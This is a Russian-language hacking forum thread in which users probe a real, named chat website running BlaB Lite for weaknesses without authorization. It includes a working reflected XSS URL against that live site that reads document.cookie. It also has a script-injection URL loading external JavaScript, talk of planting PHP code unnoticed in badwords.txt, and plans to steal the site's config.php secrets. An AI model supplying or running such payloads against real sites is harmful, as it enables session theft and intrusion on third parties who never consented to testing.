![]() |
Исследование чата BlaB Lite
набрёл на один чат:
http://schekino.net/chat/login.php решил вот поисследовать его. в итоге оказалось что чат простой до безобразия. 95 кб в архиве. посмотрел возможные уязвимости на securitylab. ничего нету :( может тогда попробуем поискать уязвимости вместе? я пока мельком пробежался по нему. из папки incl утащил в чистом виде пару файлов: mysqli_functions.inc, mysql_functions.inc, main.inc,smilies.inc, sqlite_functions.inc, skin.inc Файл config.php в корневой лежит. при открытии, что логично, пустая страница. переменные все там хранятся. теперь вот думаем как бы всё это дело утащить. может sql инъекции есть ? или ещё что. |
мдя, за 3минуты нашол xss:
http://schekino.net/chat/info.php?why=%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E хотя толку от нее нету... |
я думаю никто не будет против по поводу того что я спущу найденое мной в паблик
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script> s.js PHP код:
PHP код:
в badwords.txt можно безпалевно вписать PHP код:
|
InferNo23
согласен. может ещё что сможем интересное найти? Может отсюда что можно накопать? http://schekino.net/chat/empty.txt |
сорцы чата на nulled-warez.org есть, если ты за сорцами гонишся...
|
Цитата:
мне интереснее как можно выудить инфу из config.php важно не само его содержание, а способ узнать инфу тем более, на чате нет системы регистрации. выбрал любой ник и вошёл. админ интерфейса тоже вроде как нет. вот потому и думаю что в итоге то в чате конфиденциального есть |
Цитата:
|
| Время: 15:46 |